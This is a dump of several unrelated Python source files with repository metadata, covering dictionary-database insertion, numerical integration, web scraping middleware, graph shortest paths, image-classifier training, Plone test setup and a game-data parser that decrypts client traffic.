s.gloss.append(SenseGloss(g.lang, g.gend, g.text))
entry.senses.append(s)
return entry
def insert_name_entities(self, entries, ctx=None):
# ensure context
if ctx is None:
with self.ctx() as new_context:
return self.insert_name_entities(entries, ctx=new_context)
# else
for entry in entries:
self.insert_name_entity(entry, ctx)
def insert_name_entity(self, entry, ctx=None):
# ensure context
if ctx is None:
with self.ctx() as ctx:
return self.insert_name_entity(entry, ctx=ctx)
# else (a context is provided)
self.NEEntry.insert(entry.idseq, ctx=ctx)
# insert kanji
for kj in entry.kanji_forms:
ctx.NEKanji.insert(entry.idseq, kj.text)
# insert kana
for kn in entry.kana_forms:
ctx.NEKana.insert(entry.idseq, kn.text, kn.nokanji)
# insert translations
for s in entry.senses:
tid = ctx.NETranslation.insert(entry.idseq)
# insert name_type
for nt in s.name_type:
ctx.NETransType.insert(tid, nt)
# xref
for xr in s.xref:
ctx.NETransXRef.insert(tid, xr)
# Gloss
for g in s.gloss:
ctx.NETransGloss.insert(tid, g.lang, g.gend, g.text)
| [
"tuananh.ke@gmail.com"
] | tuananh.ke@gmail.com |
9582722a0a7a9d3283bbfeee9cb7ddad8e6c377f | 67117705720a3e3d81253ba48c1826d36737b126 | /Wk9_STRANDS/integrate.py | 42e4a34b47cb63349193c1740e61a7048b7bc760 | [] | no_license | pyliut/Rokos2021 | 41f0f96bc396b6e8a5e268e31a38a4a4b288c370 | 70753ab29afc45766eb502f91b65cc455e6055e1 | refs/heads/main | 2023-08-13T17:29:30.013829 | 2021-09-26T19:01:35 | 2021-09-26T19:01:35 | 382,092,802 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 28 15:05:28 2021
@author: pyliu
"""
import numpy as np
def integrate(integrand, spacing):
    """
    Rectangle-rule numerical integration.

    Parameters
    ----------
    integrand : FLOAT, vector
        Values of the integrand sampled across the integration range
    spacing : FLOAT, scalar
        Width of each integrating strip

    Returns
    -------
    FLOAT, scalar
        Approximate value of the integral
    """
    # Sum all strip heights first, then scale by the common strip width.
    total_height = np.sum(integrand)
    return total_height * spacing
"noreply@github.com"
] | pyliut.noreply@github.com |
9c356ecfd41e1d77531a0992d3aeeab8306f56b4 | 24c5c46f1d281fc15de7f6b72a5148ae85f89fb4 | /SRC/demo/imooc/middlewares.py | d2bed55b4f0789f23a3e7d00661f72239c8ef9df | [] | no_license | enterpriseih/easyTest | 22d87c7ffe40fb10a07f7c5cdd505f63dd45adc0 | 43b8d294e898f25055c78313cfece2753352c250 | refs/heads/master | 2023-08-23T22:55:14.798341 | 2020-02-11T09:13:43 | 2020-02-11T09:13:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,174 | py | from scrapy.http import HtmlResponse, Request, Response
from scrapy.exceptions import IgnoreRequest
from multiprocessing import Process, Pipe
from ghost import Ghost
class GhostAction:
    """Base class for an action executed inside a Ghost browser session.

    Positional and keyword arguments given to the constructor are captured
    and forwarded to action() whenever do() is called.
    """

    def __init__(self, *args, **kwargs):
        self.args = args
        self.kwargs = kwargs

    def do(self, session):
        """Run this action against ``session`` and return its result."""
        return self.action(session, *self.args, **self.kwargs)

    def action(self, session, *args, **kwargs):
        # Subclasses implement the actual browser interaction here.
        raise NotImplementedError
class DefaultOpenAction(GhostAction):
    """Open a request's URL in the session, then run its follow-up action."""

    def action(self, session, request):
        page, resources = session.open(request.url, headers=request.headers)
        if request.action:
            # Run the caller-supplied action and prefer whatever page it
            # loads, falling back to the initially opened page otherwise.
            request.action.do(session)
            loaded_page, loaded_resources = session.wait_for_page_loaded()
            if loaded_page:
                page, resources = loaded_page, loaded_resources
        return page
class GhostRequest(Request):
    """A scrapy Request rendered through a Ghost browser session.

    When ``url`` is omitted, an existing ``session`` must be supplied and
    its current URL is reused.  ``isLast`` marks the final request of a
    session, after which the worker process should be shut down.
    """

    def __init__(self, url=None, action=None, \
            session=None, isLast=False, *args, **kwargs):
        if not url:
            assert session
            url = session.currentUrl
        # Ghost requests carry session state, so never let the dupe
        # filter drop them.
        super().__init__(url, *args, dont_filter=True, **kwargs)
        self._action = action
        self._isLast = isLast
        self._session = session

    @property
    def session(self):
        """The GhostSession driving this request, if any."""
        return self._session

    @property
    def action(self):
        """Optional GhostAction to run after the page is opened."""
        return self._action

    @property
    def isLast(self):
        """True when the session should be closed after this request."""
        return self._isLast
class GhostResponse(HtmlResponse):
    """HtmlResponse whose body arrives later from the Ghost worker process.

    NOTE(review): __init__ deliberately does NOT call the HtmlResponse
    constructor -- the object stays half-initialised until waitForInit()
    receives the rendered page over the session pipe.
    """

    def __init__(self, request, session):
        self.request = request
        self.session = session

    def waitForInit(self):
        # Block until the worker sends the rendered page, then finish
        # base-class initialisation with the received
        # url/status/headers/body mapping.
        res = self.session.waitForResult()
        if res:
            super(GhostResponse, self).__init__(request=self.request, **res)
class GhostMiddleware(object):
    """Downloader middleware that renders GhostRequests in a real browser."""

    @classmethod
    def from_crawler(cls, crawler):
        return GhostMiddleware()

    def process_request(self, request, spider):
        # Non-Ghost requests fall through to the regular download handler.
        if not isinstance(request, GhostRequest):
            return None
        if request.session:
            session = request.session
            action = request.action
        else:
            # First request of a session: spin up a browser and open the URL.
            session = GhostSession()
            action = DefaultOpenAction(request)
        session.commitAction(action, wait=False)
        if request.isLast:
            session.exit()
        return GhostResponse(request, session)

    def process_response(self, request, response, spider):
        # Complete the deferred initialisation of a GhostResponse before
        # handing it to the spider.
        if isinstance(response, GhostResponse):
            response.waitForInit()
        return response
class GhostSession:
    """Client-side handle for a Ghost browser running in a child process.

    Actions are sent over a multiprocessing pipe; results come back as
    dicts describing the rendered page.
    """

    def __init__(self):
        # Backs requests created without an explicit url.
        self._currentUrl = None
        self.pipe, pipe = Pipe()
        self.startGhostProcess(pipe)

    def startGhostProcess(self, pipe):
        GhostProcess(pipe).start()

    def commitAction(self, action, wait=True):
        """Send an action to the worker, optionally waiting for it.

        NOTE(review): ``self.wait`` is not defined on this class, so
        calling with wait=True would raise AttributeError -- confirm.
        """
        self.pipe.send(action)
        if wait:
            self.wait()

    def waitForResult(self):
        """Receive the next rendered-page dict and remember its URL."""
        result = self.pipe.recv()
        self._currentUrl = result['url']
        return result

    def exit(self):
        # Sending None tells the worker loop to terminate.
        self.commitAction(None, False)

    @property
    def currentUrl(self):
        return self._currentUrl
class GhostProcess(Process):
    """Worker process that owns the actual Ghost browser.

    Receives action objects over a pipe, executes them against a Ghost
    session, and sends back a dict describing the rendered page.  A
    ``None`` action shuts the loop down.
    """

    def __init__(self, pipe):
        super().__init__()
        self.pipe = pipe
        # Last successfully loaded page; reused when an action loads nothing.
        self.currentPage = None

    def sendResult(self, session, page):
        # Serialise the page into plain picklable values for the pipe.
        res = {
            'url': page.url,
            'status': page.http_status,
            'headers': page.headers,
            'body': session.content.encode('utf-8'),
        }
        self.pipe.send(res)

    def updatePage(self, session, page):
        # Prefer the page returned by the action; otherwise wait for any
        # in-flight navigation and keep the page it produced, if any.
        if not page:
            page, extra_resources = session.wait_for_page_loaded()
        if page:
            self.currentPage = page

    def run(self):
        ghost = Ghost()
        with ghost.start(download_images=False) as session:
            while True:
                action = self.pipe.recv()
                if action is None:
                    # Shutdown sentinel from GhostSession.exit().
                    break
                page = action.do(session)
                self.updatePage(session, page)
                self.sendResult(session, self.currentPage)
| [
"yaolihui0506"
] | yaolihui0506 |
bb0cc5db2017fd3d697c4422d606f0f9508bb1cf | 9e42f3e16f46ae9161490d459adff263a083b5d8 | /ps5.2.py | c7d9e436fb5328bda9b4482482a800516e3687b0 | [] | no_license | rajshakerp/algorithm_crunching_social_network | ba7dd2d7ff748cb9b7e7e93c151285b9c2c2c575 | 2d197a199ea6bb19d65c82a65d72553be107a369 | refs/heads/master | 2020-06-12T08:03:48.949142 | 2014-06-24T21:14:53 | 2014-06-24T21:14:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,460 | py | # compute the weight of co-appear
import csv
import operator
import heapq
def make_link(G, name, book):
    """Add an undirected name<->book edge to graph G (modified in place)."""
    G.setdefault(name, {})[book] = 1
    G.setdefault(book, {})[name] = 1
    return G
def read_graph(filename):
    """Read a tab-separated edge list into a character/book graph.

    Returns (G, characters) where ``characters`` maps every left-column
    node (a character name) to 1.
    """
    tsv = csv.reader(open(filename), delimiter='\t')
    G = {}
    characters = {}
    for (node1, node2) in tsv:
        make_link(G, node1, node2)
        # Unconditional assignment: re-setting an existing key to 1 is a no-op.
        characters[node1] = 1
    return G, characters
def HG_make_link(CG, ch1, ch2):
    """Increment the co-appearance weight between ch1 and ch2 (in place)."""
    for a, b in ((ch1, ch2), (ch2, ch1)):
        CG.setdefault(a, {}).setdefault(b, 0)
    CG[ch1][ch2] += 1
    CG[ch2][ch1] += 1
def make_hop_graph(G, characters):
    """Build a weighted character graph from shared book appearances.

    The edge weight counts how many books two characters share.  Each
    unordered pair is processed once (ch1 > ch2) to avoid double counting.
    """
    HG = {}
    for ch1 in characters:
        for book in G[ch1]:
            for ch2 in G[book]:
                if ch1 > ch2:
                    HG_make_link(HG, ch1, ch2)
    return HG
def WG_make_link(HG, WG, ch1, ch2, routes):
    # Run single-source Dijkstra from ch1 over the co-appearance graph and
    # record hop counts (routes) and weighted distances (WG).
    # NOTE(review): ch2 is unused, so the same ch1 result is recomputed for
    # every qualifying pair by the caller.
    routes[ch1], WG[ch1] = dijkstra(HG, ch1)
def make_weight_graph(HG, characters):
    """Compute weighted shortest paths from every character in HG.

    Returns (WG, routes): WG[ch] maps each reachable node to its weighted
    distance from ch; routes[ch] maps it to the hop count of that path.

    Fix: the original invoked WG_make_link -- i.e. a full Dijkstra run --
    once per qualifying *pair* (ch1, ch2), recomputing and overwriting the
    identical single-source result many times.  Run it once per source
    instead; the produced (WG, routes) are unchanged.
    """
    WG = {}
    routes = {}
    for ch1 in HG:
        # Same trigger condition as the original pair loop: at least one
        # neighbor ch2 with ch1 > ch2.
        if any(ch1 > ch2 for ch2 in HG[ch1]):
            WG_make_link(HG, WG, ch1, None, routes)
    return WG, routes
# should compute the entire route: len([v, b, c, e])
def dijkstra(HG, v):
heap = [(0, v)]
dist_so_far = {v: 0}
route_cnt = {v: 0}
final_dist = {}
while dist_so_far:
(w, k) = heapq.heappop(heap)
if k in final_dist or (k in dist_so_far and w > dist_so_far[k]):
continue
else:
del dist_so_far[k]
final_dist[k] = w
for neighbor in [nb for nb in HG[k] if nb not in final_dist]:
nw = final_dist[k] + 1.00 / HG[k][neighbor]
if neighbor not in dist_so_far or nw < dist_so_far[neighbor]:
dist_so_far[neighbor] = nw
route_cnt[neighbor] = route_cnt[k] + 1
heapq.heappush(heap, (final_dist[k] + 1.00 / HG[k][neighbor], neighbor))
return route_cnt, final_dist
def sub_test():
    # Smoke test of the whole pipeline on a hand-built 4-character dataset.
    # NOTE: this file uses Python 2 print statements.
    (marvelG, characters) = ({
        'A': {'AB_book', 'AC_book', 'ABCD_book', 'AB_book2'},
        'AB_book': {'A', 'B'},
        'AB_book2': {'A', 'B'},
        'B': {'AB_book', 'BD_book', 'ABCD_book', 'AB_book2'},
        'BD_book': {'B', 'D'},
        'D': {'BD_book', 'CD_book', 'ABCD_book'},
        'CD_book': {'C', 'D'},
        'C': {'CD_book', 'AC_book', 'ABCD_book'},
        'AC_book': {'A', 'C'},
        'ABCD_book': {'A', 'B', 'C', 'D'}
    }, {'A': 1, 'B': 1, 'C': 1, 'D': 1})
    HG = make_hop_graph(marvelG, characters)
    (WG, w_routes) = make_weight_graph(HG, characters)
    print HG
    print WG
    print w_routes
    # Count reachable pairs whose best weighted path takes more than one hop.
    count = 0
    for ch1 in w_routes:
        for ch2 in w_routes[ch1]:
            if ch1 != ch2 and 1 != w_routes[ch1][ch2]:
                count += 1
    print count
def test():
    # Full run on the Marvel co-appearance dataset read from the
    # 'marvel_graph' TSV file in the working directory.
    (marvelG, characters) = read_graph('marvel_graph')
    HG = make_hop_graph(marvelG, characters)
    (WG, w_routes) = make_weight_graph(HG, characters)
    # Count reachable pairs whose best weighted path takes more than one hop.
    count = 0
    for ch1 in w_routes:
        for ch2 in w_routes[ch1]:
            if ch1 != ch2 and 1 != w_routes[ch1][ch2]:
                count += 1
    print count


# Run the toy sanity check first, then the full dataset.
sub_test()
test()
| [
"="
] | = |
03c7db3d432555998947878d40132af841780c83 | 57ef48cbc61bc3bf890088ec24a50c440bc36072 | /dogflb/train-tiny.py | 5abdd5e1943352ec94cd42ee7dac641ef5b1603d | [] | no_license | ShenDezhou/CAIL2021 | 8be1ea07dd47085126b9092998de72dc0c70973d | aab19b42e9ea1ba29158df577087e827419adae8 | refs/heads/master | 2023-03-28T11:17:09.541712 | 2021-03-29T14:11:40 | 2021-03-29T14:11:40 | 328,170,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,373 | py | import os
import jittor as jt
import jittor.nn as nn
from dataset import TsinghuaDog
from jittor import transform
from jittor.optim import Adam, SGD
from tqdm import tqdm
import numpy as np
from model import Net
import argparse
jt.flags.use_cuda=1
def get_path(path):
    """Create the parent directory of ``path`` if it does not exist.

    Args:
        path: path to be used

    Returns:
        The unchanged path, whose parent directory is guaranteed to exist.
    """
    parent = os.path.dirname(path)
    # Fix: a bare filename has an empty dirname and os.makedirs('') raises;
    # exist_ok=True also removes the exists()/makedirs() race of the
    # original implementation.
    if parent:
        os.makedirs(parent, exist_ok=True)
    return path
def train(model, train_loader, optimizer, epoch):
    """Run one training epoch, reporting per-batch loss/accuracy via tqdm."""
    model.train()
    total_acc = 0
    total_num = 0
    losses = 0.0
    pbar = tqdm(train_loader, desc=f'Epoch {epoch} [TRAIN]')
    for images, labels in pbar:
        output = model(images)
        loss = nn.cross_entropy_loss(output, labels)
        # jittor optimizers take the loss directly (backward + update).
        optimizer.step(loss)
        pred = np.argmax(output.data, axis=1)
        acc = np.mean(pred == labels.data) * 100
        # NOTE(review): total_acc/total_num/losses are accumulated but never
        # reported or returned.
        total_acc += acc
        total_num += labels.shape[0]
        losses += loss
        pbar.set_description(f'Epoch {epoch} [TRAIN] loss = {loss.data[0]:.2f}, acc = {acc:.2f}')
# Best validation accuracy seen so far (module level, updated by evaluate()).
best_acc = -1.0


def evaluate(model, val_loader, epoch=0, save_path='./best_model.bin'):
    """Evaluate on val_loader and checkpoint the model on improvement.

    Side effects: updates the module-global ``best_acc`` and writes the
    model weights to ``save_path`` whenever accuracy improves.
    """
    model.eval()
    global best_acc
    total_acc = 0
    total_num = 0
    pbar = tqdm(val_loader, desc=f'Epoch {epoch} [EVAL]')
    for images, labels in pbar:
        output = model(images)
        pred = np.argmax(output.data, axis=1)
        # Running count of correct predictions / samples seen.
        acc = np.sum(pred == labels.data)
        total_acc += acc
        total_num += labels.shape[0]
        pbar.set_description(f'Epoch {epoch} [EVAL] acc = {total_acc / total_num :.2f}')
    acc = total_acc / total_num
    if acc > best_acc:
        best_acc = acc
        get_path(save_path)
        model.save(save_path)
    print ('Test in epoch', epoch, 'Accuracy is', acc, 'Best accuracy is', best_acc)
#python train-tiny.py --epochs 5 --batch_size 32 --dataroot /mnt/data/dogfldocker --model_path model/res50/model.bin --resume False
def main():
    """Parse CLI arguments, build dataloaders/model/optimizer and run the
    train/eval loop (or a single evaluation when --eval is set)."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--batch_size', type=int, default=32)
    parser.add_argument('--epochs', type=int, default=50)
    parser.add_argument('--num_classes', type=int, default=130)
    parser.add_argument('--lr', type=float, default=2e-3)
    parser.add_argument('--weight_decay', type=float, default=1e-5)
    # NOTE(review): argparse's type=bool treats ANY non-empty string as
    # True, so `--resume False` still enables resuming -- confirm intended.
    parser.add_argument('--resume', type=bool, default=False)
    parser.add_argument('--eval', type=bool, default=False)
    parser.add_argument('--dataroot', type=str, default='/content/drive/MyDrive/dogflg/data2/')
    parser.add_argument('--model_path', type=str, default='./best_model.bin')
    parser.add_argument('--sampleratio', type=float, default=0.8)
    args = parser.parse_args()
    transform_train = transform.Compose([
        transform.Resize((256, 256)),
        transform.CenterCrop(224),
        transform.RandomHorizontalFlip(),
        transform.ToTensor(),
        transform.ImageNormalize(0.485, 0.229),
        # transform.ImageNormalize(0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
    ])
    root_dir = args.dataroot
    train_loader = TsinghuaDog(root_dir, batch_size=args.batch_size, train=True, part='train', shuffle=True, transform=transform_train, sample_rate=args.sampleratio)
    transform_test = transform.Compose([
        transform.Resize((256, 256)),
        transform.CenterCrop(224),
        transform.ToTensor(),
        transform.ImageNormalize(0.485, 0.229),
        # transform.ImageNormalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
    ])
    val_loader = TsinghuaDog(root_dir, batch_size=args.batch_size, train=False, part='val', shuffle=False, transform=transform_test, sample_rate=args.sampleratio)
    epochs = args.epochs
    model = Net(num_classes=args.num_classes)
    lr = args.lr
    weight_decay = args.weight_decay
    # NOTE(review): weight_decay is parsed but never passed to the optimizer.
    optimizer = SGD(model.parameters(), lr=lr, momentum=0.99)
    if args.resume:
        model.load(args.model_path)
        print('model loaded', args.model_path)
    #random save for test
    #model.save(args.model_path)
    if args.eval:
        evaluate(model, val_loader, save_path=args.model_path)
        return
    for epoch in range(epochs):
        train(model, train_loader, optimizer, epoch)
        evaluate(model, val_loader, epoch, save_path=args.model_path)


if __name__ == '__main__':
    main()
| [
"bangtech@sina.com"
] | bangtech@sina.com |
9ef838759387609b5be7812eeda6c96df2a63f72 | 1cb8f578fab815e7031b9302b809d2fce1bad56f | /plone/app/s5slideshow/tests/base.py | 25e2d02fbf315c5cee64b5438058531f37813840 | [] | no_license | toutpt/plone.app.s5slideshow | 103856fdefc6504193e9d5b981fa377c7c5ace1a | ee2129c3e40cc03fadad2490730100ad715f5395 | refs/heads/master | 2020-06-04T15:18:27.754687 | 2012-02-28T07:52:39 | 2012-02-28T07:52:39 | 3,160,939 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,002 | py | import unittest2 as unittest
from zope import interface
from plone.app import testing
from plone.app.s5slideshow.tests import layer
class UnitTestCase(unittest.TestCase):
    """Bare unit-test base class with no Plone test layer attached."""

    def setUp(self):
        super(UnitTestCase, self).setUp()
class TestCase(unittest.TestCase):
    """Integration-test base: exposes the Plone portal and a fake request."""

    layer = layer.INTEGRATION

    def setUp(self):
        # Request comes from ZPublisher's publish-test helpers and stands in
        # for a real HTTP request object.
        from ZPublisher.tests.testPublish import Request
        super(TestCase, self).setUp()
        self.portal = self.layer['portal']
        self.request = Request()
class FunctionalTestCase(unittest.TestCase):
    """Functional-test base bound to the FUNCTIONAL layer.

    NOTE(review): setUp grants the Manager role and then immediately
    replaces it with Member, so only Member is in effect -- confirm
    this is intended.
    """

    layer = layer.FUNCTIONAL

    def setUp(self):
        super(FunctionalTestCase, self).setUp()
        self.portal = self.layer['portal']
        testing.setRoles(self.portal, testing.TEST_USER_ID, ['Manager'])
        testing.setRoles(self.portal, testing.TEST_USER_ID, ['Member'])
def build_test_suite(test_classes):
suite = unittest.TestSuite()
for klass in test_classes:
suite.addTest(unittest.makeSuite(klass))
return suite
| [
"toutpt@gmail.com"
] | toutpt@gmail.com |
18821b556650d403c0a02ae62e4c2f09bc774a23 | 51fb5fe41a2c5030fb9e46a029f80e8b637714f3 | /factory_app/factory.py | be6e96c991075f0550c8462cc83bba811227800a | [] | no_license | aliensmart/week2_day3 | 6c7512c77c09424c87cdd64fe634b23ae54ffa21 | 21125022850c398aa0b68295f2e40ca18c573f13 | refs/heads/master | 2020-07-13T05:31:44.581603 | 2019-08-29T19:25:27 | 2019-08-29T19:25:27 | 205,004,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,503 | py | #!/usr/bin/env python3
#Class
# Worker
# Item
# Factory
class Worker:
    """A factory worker with a name, a job title and years of tenure.

    Attributes:
        name: the worker's name
        job: the worker's job title
        years: number of years at the factory
        department: current department for the day (None until assigned)
    """

    def __init__(self, name, job, years):
        self.name = name
        self.job = job
        self.years = years
        self.department = None

    def set_department(self, depart):
        """Re-assign the worker's department (a string) for the day."""
        self.department = depart

    def increase_tenure(self):
        """Add one year to the worker's time at the factory."""
        self.years = self.years + 1
class Item:
    """A factory product with a name, explosiveness flag, weight and cost."""

    def __init__(self, name, explosive, weight, cost):
        self.name = name
        self.explosive = explosive
        self.weight = weight
        self.cost = cost

    def explode(self):
        """Return "Boom" when the item is explosive, otherwise None."""
        return "Boom" if self.explosive == True else None
# Module-level sample item, handy for quick manual testing of Item.explode().
battery = Item("battery", True, "4lbs", 200.99)
class Factory:
    """Tracks workers on staff, unshipped products and the safety streak.

    Attributes:
        workers: list of Worker objects on staff
        products: list of Item objects awaiting shipment
        days_since_last_incident: safety counter, reset by incident()
    """

    def __init__(self, workers=None, products=None):
        # Fix: the original used mutable default arguments (workers=[],
        # products=[]), so every Factory created without arguments shared
        # the very same lists.  Use None sentinels and fresh lists instead.
        self.workers = workers if workers is not None else []
        self.products = products if products is not None else []
        self.days_since_last_incident = 0

    def add_worker(self, worker):
        """Add a Worker object to our self.workers list."""
        self.workers.append(worker)

    def create_product(self, item):
        """Add an Item object to our self.products list."""
        self.products.append(item)

    def ship(self):
        """Remove everything from the current product inventory."""
        self.products = []

    def add_day(self):
        """Add 1 to our days_since_last_incident counter."""
        self.days_since_last_incident += 1

    def incident(self):
        """Reset days_since_last_incident to 0."""
        self.days_since_last_incident = 0
| [
"kaoua17@gmail.com"
] | kaoua17@gmail.com |
34eb6021b51846ce284b8d310da82c2d4e56b2e5 | e905abd9bb7bd7017657d0a0c4d724d16e37044c | /.history/article/spiders/acm_20201230145258.py | 2bfa13a12a05f543b22b93f69e8ea2d0698e1dd7 | [] | no_license | tabdelbari/articles | a8b921841f84fb473f5ed1cdcda743863e6bc246 | f0e1dfdc9e818e43095933139b6379a232647898 | refs/heads/main | 2023-03-05T10:21:35.565767 | 2021-02-10T13:35:14 | 2021-02-10T13:35:14 | 325,654,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,360 | py | import scrapy
import logging
import re
from scrapy_splash import SplashRequest
from article.items import ArticleItem
class AcmSpider(scrapy.Spider):
    """Scrapy spider that searches the ACM Digital Library and scrapes
    article metadata (title/authors/abstract/date/journal) per result.

    Pages are rendered through Splash (with a 10 s wait) since dl.acm.org
    is JavaScript-heavy.
    """
    name = 'acm'
    allowed_domains = ['acm.org']

    def __init__(self, topic='', keywords='', **kwargs):
        # `keywords` seeds the search query; `topic` is copied onto every
        # emitted item.
        super().__init__(**kwargs)
        self.start_urls = ['https://dl.acm.org/action/doSearch?AllField=%s' %keywords]
        self.topic = topic

    def start_requests(self):
        for url in self.start_urls:
            yield SplashRequest(url, callback=self.find_articles, args={ 'wait': 10 })

    def find_articles(self, response):
        """Queue every article on a results page, then follow pagination."""
        # logging.info(response.text)
        articles_urls = response.xpath('.//*/div[contains(@class,"issue-item")]/*/h5/span/a/@href').getall()
        logging.info(f'{len(articles_urls)} articles found')
        for url in articles_urls:
            # Result hrefs are site-relative; prepend the host.
            article_url = 'https://dl.acm.org' + url
            yield SplashRequest(article_url, callback=self.parse, args={ 'wait': 10 })
        next_page = response.xpath('.//*/nav[contains(@class, "pagination")]/span/a[@title="Next Page"]/@href').get(default='')
        logging.info('Next page found:')
        if next_page != '':
            yield SplashRequest(next_page, callback=self.find_articles, args={ 'wait': 10 })

    def parse(self, response):
        """Extract one ArticleItem from an article detail page."""
        logging.info('Processing --> ' + response.url)
        article = ArticleItem()
        # NOTE(review): `result` is built but never used below.
        result = {
            'title' : '',
            'authors': '',
            'country': '',
            'abstract': '',
            'date_pub': '',
            'journal': '',
        }
        # NOTE(review): these xpaths select element nodes (no text() step),
        # so the stored values include the surrounding HTML tags.
        article['title'] = response.xpath('//*/article/*/div[@class="citation"]/div/h1[@class="citation__title"]').get(default='')
        authors = response.xpath('//*/div[@class="citation"]/div/div/ul/li/a/@title').getall()
        article['authors'] = '|'.join(authors)
        article['country'] = ''
        article['abstract'] = response.xpath('//*/div[contains(@class,"abstractSection")]/p').get(default='')
        article['date_pub'] = response.xpath('//*/span[@class="epub-section__date"]').get(default='')
        article['journal'] = response.xpath('//*/span[@class="epub-section__title"]').get(default='')
        article['topic'] = self.topic
        article['latitude'] = ''
        article['longitude'] = ''
        yield article
| [
"abdelbari1996@hotmail.com"
] | abdelbari1996@hotmail.com |
196350b247e6e73f9e41c83c7b55dd2e29bd78ff | bd8bc7abe0f774f84d8275c43b2b8c223d757865 | /319_BulbSwitcher/bulbSwitch.py | 4de5dafd05b7f22e9e8a57594d76e8b90b6370fc | [
"MIT"
] | permissive | excaliburnan/SolutionsOnLeetcodeForZZW | bde33ab9aebe9c80d9f16f9a62df72d269c5e187 | 64018a9ead8731ef98d48ab3bbd9d1dd6410c6e7 | refs/heads/master | 2023-04-07T03:00:06.315574 | 2021-04-21T02:12:39 | 2021-04-21T02:12:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | class Solution:
def bulbSwitch(self, n: int) -> int:
return math.floor(math.sqrt(n))
| [
"noreply@github.com"
] | excaliburnan.noreply@github.com |
4b455ab46b88e01a9384c549a1c0160ffe5018b5 | 30fce7251d3ba9f3868fff08fdb9ab9a0a6ff23b | /bestiary/com2us_data_parser.py | a6bee9ce7a41abf17e7623b532a5cde97f6f2d30 | [
"Apache-2.0"
] | permissive | alinford/swarfarm | 16fd07d313c5d6453a957468336dab8eb6cc3cd7 | 95042e4bb685b6f2f4e887ee22e8dad0625a46bf | refs/heads/master | 2020-06-02T11:53:13.013695 | 2019-06-08T05:32:23 | 2019-06-08T05:32:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 49,171 | py | import base64
import binascii
import csv
import json
import re
import zlib
from enum import IntEnum
from glob import iglob
from numbers import Number
from Crypto.Cipher import AES
from PIL import Image
from bitstring import Bits, BitStream, ConstBitStream, ReadError
from django.conf import settings
from sympy import simplify
from bestiary.com2us_mapping import *
from .models import Skill, ScalingStat, SkillEffect, CraftMaterial, MonsterCraftCost, HomunculusSkill, \
HomunculusSkillCraftCost, Dungeon, SecretDungeon, Level
def _decrypt(msg):
    """AES-CBC decrypt ``msg`` with the Summoners War secret key and an
    all-zero IV, then strip PKCS#7 padding (last byte = pad length)."""
    obj = AES.new(
        bytes(settings.SUMMONERS_WAR_SECRET_KEY, encoding='latin-1'),
        AES.MODE_CBC,
        b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    )
    decrypted = obj.decrypt(msg)
    return decrypted[:-decrypted[-1]]
def decrypt_request(msg):
    # Game requests are base64(AES(payload)) with no compression.
    return _decrypt(base64.b64decode(msg))
def decrypt_response(msg):
    # Game responses are base64(AES(zlib(payload))): decode, decrypt, inflate.
    decoded = base64.b64decode(msg)
    decrypted = _decrypt(decoded)
    decompressed = zlib.decompress(decrypted)
    return decompressed
def update_all():
    """Run the full import pipeline: assets, skills, monsters, homunculi."""
    decrypt_com2us_png()
    crop_monster_images()
    parse_skill_data()
    parse_monster_data()
    parse_monster_data()  # Runs twice to set awakens to/from relationships which is not possible until after both monsters are created
    parse_homunculus_data()
def _create_new_skill(com2us_id, slot):
    # Placeholder Skill row; the real name/levels are filled in afterwards
    # by parse_skill_data().
    print('!!! Creating new skill with com2us ID {}, slot {}'.format(com2us_id, slot))
    return Skill.objects.create(com2us_id=com2us_id, name='tempname', slot=slot, max_level=1)
# Operator characters recognised in the game's multiplier expressions.
PLAIN_OPERATORS = '+-*/^'


def _force_eval_ltr(expr):
    """Convert a com2us skill-multiplier expression tree into a fully
    parenthesised infix string that evaluates strictly left-to-right.

    ``expr`` is a nested list of operand/operator tokens as stored in the
    game's "fun data" column.  Returns (formula_string, fixed) where
    ``fixed`` is True when the expression carried a FIXED marker.
    NOTE(review): returns None implicitly when expr is not a list.
    """
    fixed = False
    if isinstance(expr, list):
        # Check if elements are strings or another array
        if expr and all(isinstance(elem, str) or isinstance(elem, Number) for elem in expr):
            expr_string = ''.join(map(str, expr))
            if 'FIXED' in expr_string:
                fixed = True
                expr_string = expr_string.replace('FIXED', '')
            if 'CEIL' in expr_string:
                expr_string = expr_string.replace('CEIL', '')
            # Remove any multiplications by 1 beforehand. It makes the simplifier function happier.
            expr_string = expr_string.replace('*1.0', '')
            if expr_string not in PLAIN_OPERATORS:
                # Left-to-right grouping: open one paren per operand, then
                # close one after each operator application.
                all_operations = filter(None, re.split(r'([+\-*/^])', expr_string))
                operands = list(filter(None, re.split(r'[+\-*/^]', expr_string)))
                group_formula = '(' * len(operands)
                for operator in all_operations:
                    if operator in PLAIN_OPERATORS:
                        group_formula += operator
                    else:
                        group_formula += f'{operator})'
                return f'({group_formula})', fixed
            else:
                return f'{expr_string}', fixed
        else:
            # Process each sub-expression in LTR manner
            ltr_expr = ''
            for partial_expr in expr:
                partial_expr_ltr, fixed = _force_eval_ltr(partial_expr)
                if partial_expr_ltr not in PLAIN_OPERATORS:
                    ltr_expr = f'({ltr_expr}{partial_expr_ltr})'
                else:
                    ltr_expr += partial_expr_ltr
            return ltr_expr, fixed
def parse_skill_data(preview=False):
    """Synchronise bestiary Skill rows against the decoded game tables.

    Creates missing skills (only when actually used by a monster or a
    homunculus skill tree), then updates name, description, icon,
    cooltime, max level, level-up text, scaling stats and the multiplier
    formula.  With ``preview=True`` changes are computed but not saved.
    """
    monster_table = _get_localvalue_tables(LocalvalueTables.MONSTERS)
    skill_table = _get_localvalue_tables(LocalvalueTables.SKILLS)
    skill_names = get_skill_names_by_id()
    skill_descriptions = get_skill_descs_by_id()
    homunculus_skill_table = _get_localvalue_tables(LocalvalueTables.HOMUNCULUS_SKILL_TREES)
